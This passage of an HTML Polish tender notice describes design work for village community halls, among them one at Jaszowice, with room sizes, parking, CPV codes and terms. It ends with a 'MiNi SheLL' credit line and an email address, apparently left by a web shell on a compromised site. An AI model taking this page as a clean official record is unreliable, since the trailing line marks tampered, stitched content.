-	zagospodarowanie terenu w tym miejsca postojowe (10-15 miejsc parkingowych), ciągi komunikacyjne, plac zabaw, boisko do gry w piłkę nożną, boisko uniwersalne do gry w siatkówkę i koszykówkę. Należy zwrócić uwagę na zagospodarowanie całości działki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-0, 71.22.20.00-0, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa świetlicy wiejskiej w miejscowości Jaszowice na dz. nr 59/4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Proponuje się aby budynek posiadał:
-	salę główną o pow. ok. 50,00 m2 
-	bibliotekę mieszczącą ok. 7500 książek
-	zaplecze kuchenne (podgrzewalnia posiłków) o pow. ok. 17,00 m2 
-	niezbędne pomieszczenia towarzyszące m.in. toalety, szatnia, magazynek
-	zagospodarowanie terenu w tym miejsca postojowe (20 miejsc parkingowych + 1 miejsce dla autobusu, umieszczone w taki sposób aby autobus mógł swobodnie zawrócić), ciągi komunikacyjne, plac zabaw (2- 3 podstawowe zabawki np. zjeżdżalnia, huśtawka. Należy zwrócić uwagę na sposób oraz miejsce odprowadzenia wody deszczowej z terenu działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-0, 71.22.20.00-0, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com